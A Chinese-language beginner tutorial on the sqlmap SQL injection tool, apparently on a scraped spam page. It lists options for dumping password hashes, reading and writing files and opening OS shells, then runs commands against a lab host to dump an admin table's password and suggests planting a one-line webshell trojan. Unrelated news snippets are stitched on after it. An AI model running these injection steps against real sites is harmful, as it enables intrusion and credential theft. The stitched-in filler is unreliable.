咨询热线:13680849621 联系人:赵冰 地址:广西南宁市西乡塘区科园大道
sqlmap注入入门
来源:ag环亚集团 发布时间:2019-11-25 点击量:318
sqlmap注入入门
sqlmap的用法:
linux中: sqlmap [选项]
Windows中: python sqlmap [选项]
常用的参数及含义:
目标
-d DIRECT 直接连接数据库
-u URL, --url=URL 目标 URL(例如:"http://www.site.com/vuln.php?id=1")
-l LOGFILE 从 Burp 或 WebScarab 代理的日志文件中解析目标地址
-x SITEMAPURL 从远程网站地图(.xml)文件中解析目标
-m BULKFILE 从文本文件中获取批量目标
-r REQUESTFILE 从文件中读取 HTTP 请求
-g GOOGLEDORK 使用 Google dork 结果作为目标
-c CONFIGFILE 从 INI 配置文件中加载选项
枚举:
以下选项用于获取后端数据库管理系统的信息,结构和数据表中的数据。此外,还可以运行你输入的 SQL 语句
a, --all 获取所有信息、数据
-b, --banner 获取 DBMS banner
--current-user 获取 DBMS 当前用户
--current-db 获取 DBMS 当前数据库
--hostname 获取 DBMS 服务器的主机名
--is-dba 探测 DBMS 当前用户是否为 DBA(数据库管理员)
--users 枚举出 DBMS 所有用户
--passwords 枚举出 DBMS 所有用户的密码哈希
--sql-query=QUERY 指定要执行的 SQL 语句
--sql-shell 调出交互式 SQL shell
--sql-file=SQLFILE 执行文件中的 SQL 语句
暴力破解:
以下选项用于暴力破解测试
--common-tables 检测常见的表名是否存在
--common-columns 检测常用的列名是否存在
访问文件系统:
以下选项用于访问后端数据库管理系统的底层文件系统
--file-read=RFILE 读取后端 DBMS 文件系统中的文件
--file-write=WFILE 写入后端 DBMS 文件系统中的文件
--file-dest=DFILE 使用文件绝对路径写入到后端 DBMS
访问操作系统:
以下选项用于访问后端数据库管理系统的底层操作系统
--os-cmd=OSCMD 执行操作系统命令
--os-shell 调出交互式操作系统 shell
--os-pwn 调出 OOB shell,Meterpreter 或 VNC
--os-smbrelay 一键调出 OOB shell,Meterpreter 或 VNC
靶机实战
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11
可以得出目标主机是Ubuntu,web服务为apache,数据库管理系统是MySQL以及它们的版本信息。
列举出DBMS中所有的数据库
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --dbs
获取DBMS当前数据库
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --current-db
列举出test数据库中的所有表名
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 -D test --tables
我们发现了一个admin表,猜测其中可能有网站管路员的密码信息
查询admin表中的所有信息
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-query="select * from test.admin;"
我们获得了admin账户的密码,为mysql,我们可以利用admin用户,向目标服务器上传一句话木马,获取webshell。(可以自行百度“一句话木马”)
调出交互式SQL shell
root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-shell
在sql-shell可以执行sql查询语句
select * from test.admin;
和第四步得到的结果是一样的
##### 小结
利用SQLmap可以进行简单的sql注入,方便快捷。利用sqlmap可以查看目标机器的os,DBMS等。还可以可以枚举数据库、表、列。以上结果只是为了演示sqlmap的基本用法,在实际操作中很可能注入失败,可以进一步的查看sqlmap wiki。
相关产品
-
而就在上周,在意大利阿马特里切附近的一个小村"San Lorenzo a Flaviano "的废墟中,救援人员还救出了一只名叫罗密欧的"狗坚强"。
-
有记者提问,近期,中国周边国家如韩国、日本的民众对中国的空气污染扩散到他们的国家表示不满。中方对此有何回应?中方是否与有关国家政府进行了沟通?
-
一、多观察多向中队其中班长学习他们的长处,遇有复杂问题时,积极开动大脑,活学活用,创新工作方法,争取达到事半功倍的效果。
-
面对能源危机和巨大的节能环保压力,车企平均油耗制度后续将被严格推行。工信部表示,将加快推进平均油耗《管理办法》的研究与制定,进一步完善我国汽车产品节能管理制度。
-
据了解,中国游泳队2日在北京集中,庆文怡作为国家队代训队员,放假回来只是进行恢复性训练,运动量和运动强度都不大。8日下午,庆文怡和队友一起进行不到1000米的放松游。晚上9时多,她和母亲通电话,商量上大学的事情。晚上10时30分左右,她还在发微信。然而9日凌晨三四点钟,庆文怡一声大叫惊醒室友,随即对室友的呼叫没有了回应。室友马上请来队医,随即庆文怡被送往天坛医院抢救,最终医院宣布抢救无效离世。
-
今年是该项传统景观赛事第10年落户上海浦东。为了推广射箭运动,国际箭联近几年致力打造城市“景观体育”,土耳其安塔利亚海滩、墨西哥玛雅金字塔、丹麦哥本哈根美人鱼雕像、阿联酋迪拜帆船酒店都曾是射箭世界杯分站赛的赛场背景。上海站的决赛场地则毗邻上海中心、金茂大厦等地标性建筑,向世界展示了颇具代表性的上海风貌。
-
她惊喜地看到,一学期结束,很多学生从对游戏一无所知甚至带有偏见,到学会了把游戏作为改变自己生活点滴的工具。一次期末展示环节令她印象颇深,一位女生设计了一款游戏,用来解决情侣吵架后谁先开口说话的问题。
-
中新网9月11日电 据新加坡《联合早报》报道,现年63岁的新加坡华人妇产科医生王腾吉多次载14岁少女到武吉布朗坟场胡搞,第一次跟少女开房后,竟给少女两颗“事后丸”,还坚持少女在车内先服下一颗。
热点资讯
- 历城区住建委开展物业“行评”活动2019-11-25
- 《神武3》城市玩乐会佛山站开启报名2019-11-25
- 通产丽星连续六涨停重组方案遭深交所问询2019-11-25
- 比亚迪再出神车,双电机,造型比X6还帅!网友:这次要火了!2019-11-25
- 重返科普卢星区《星际争霸:重制版》开发者宣传片公开2019-11-25
- 官员:保罗的腘绳肌二度拉伤预计将缺席2-3周。2019-11-25
- ChinaJoy上大屏玩吃鸡什么体验?我们试玩了下凤凰1号安卓主机2019-11-25
- 用信鸽来讲解HTTPS的知识2019-11-25